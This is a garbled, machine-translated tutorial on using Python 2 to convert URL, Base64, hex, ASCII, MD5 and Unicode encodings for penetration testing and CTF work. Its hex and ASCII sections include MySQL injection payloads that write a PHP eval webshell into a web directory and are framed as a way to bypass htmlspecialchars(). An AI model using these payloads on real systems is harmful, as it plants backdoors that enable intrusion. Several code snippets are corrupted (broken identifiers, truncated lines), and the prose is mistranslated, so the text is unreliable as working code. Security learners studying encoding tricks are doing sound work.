In daily infiltration, vulnerability mining, and even the CTF race will encounter a variety of coding, often accompanied by the various conversions between these encodings. The following article mainly introduces the use of code conversion in Python related data, the need for friends can reference, let's take a look at it.
Objective
Remember just getting started that time, their own handling of the code conversion problem is often "Baidu: URL decoding, base64 encryption, Hex ...", or the use of a "small Kwai multifunctional conversion tool" software, and then directly on the Burpsuite decoder function, feel very good. However, there are some problems: low online conversion efficiency (search takes up 2/3 of the time), two tools have some small problems, such as the burp in the Chinese language is often shown garbled.
Until I use Python as my daily Code conversion tool ...
Turn on the PY conversion tour
URL encoding
URL encoding is a format that a browser uses to package form input. It is one of the most familiar coding methods for web workers.
>>> from urllib import *>>> quote ("union select Null,null,null") ' union%20select%20null%2cnull% 2Cnull ' >>> unquote ("Union%20select%20null%2cnull%2cnull") ' Union select Null,null,null ' >>> UrlEncode ({' x ': ' 2333 ', ' y ': ' 666 '}) ' y=666&x=2333 '
Base64
Base64 is often used as a parameter for Web forms and HTTP transmissions, and is often used for messaging protocol transmission of user information.
>>> Import base64>>> base64.b64encode ("admin") ' ywrtaw4= ' >>> base64.b64decode (' ywrtaw4= ') ) ' admin '
Remember that there was a CTF contest to Base32 decryption, the general website does not provide online decryption, seemingly no way to continue. But if you use Python it will be as simple as decrypting base64, just change the function:
>>> Import base64>>> base64.b32encode (' jjjjj ') ' NJVGU2TK ' >>> base64.b32decode (' NJVGU2TK ' ) ' JJJJJ '
Hex
Hex encoding is also a common encoding scheme in Web application. As a Web security officer, we know that MySQL injection can write Webshell using the Hex bypass htmlspecialchars()
function.
Like what:
Select 0x3c3f70687020406576616c28245f504f53545b615d293b203f3e into outfile '/web/1.php '
Here's how Python implements hex plus decryption:
>>> ' <?php @eval ($_post[a]);?> '. Encode (' hex ') ' 3c3f70687020406576616c28245f504f53545b615d293b203f3e ' >>>>>> print ' 3c3f70687020406576616c28245f504f53545b615d293b203f3e '. Decode (' hex ') <?php @eval ($_post[a]);?>>>>
Ascii
The function in MySQL char()
is to convert the ASCII code, because of this, you can also use this feature to bypass the htmlspecialchars()
function.
Like what:
Select char (60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 97, 93, 41, 59, 32, 63, 62) into outfile '/web/1.php '
Using Python to convert a string to ASCII is simple, but the inverse conversion requires a little bit of action:
>>> map (ord, "<?php phpinfo ()?>") [60, 63, 112, 104, 112, 32, 112, 104, 112, 105, 110, 102, 111, 40, 41, 32 , 62]>>> print chr (p>>> l = [60, 63, 112, 104, 112, 32, 112, 104, 112, 105, 110, 102, 111, 40, 4 1, 62]>>> print ". Join (Map (chr,l)) #感谢pcat表哥指出的方法 <?php phpinfo ()?>
Md5
MD5 in the Web security community can be said to be all-around, with his irreversibility, most websites store user passwords and other key data often use MD5 encryption. Sometimes we submit payload need MD5 encryption, this time with the following method can be easily implemented. Of course, the decryption of the words recommended to CMD5.
>>> from hashlib import md5>>> m = MD5 () >>> m.update (' This is a secret ') >>> m.hexdiges T () ' 7dbbcee180ba4d456e4aa1cfbdad9c7b ' >>> m.hexdigest () [8:-8] ' 80ba4d456e4aa1cf ' >>>
Unicode to Chinese
Unicode converts Chinese, which can be encountered in many cases. Especially when it comes to penetration testing. With burp words there will be the problem of Chinese garbled, in Python implementation is very simple.
>>> print U "\u4f60\u9700\u8981\u91cd\u65b0\u767b\u9646" You need to re-login
Summarize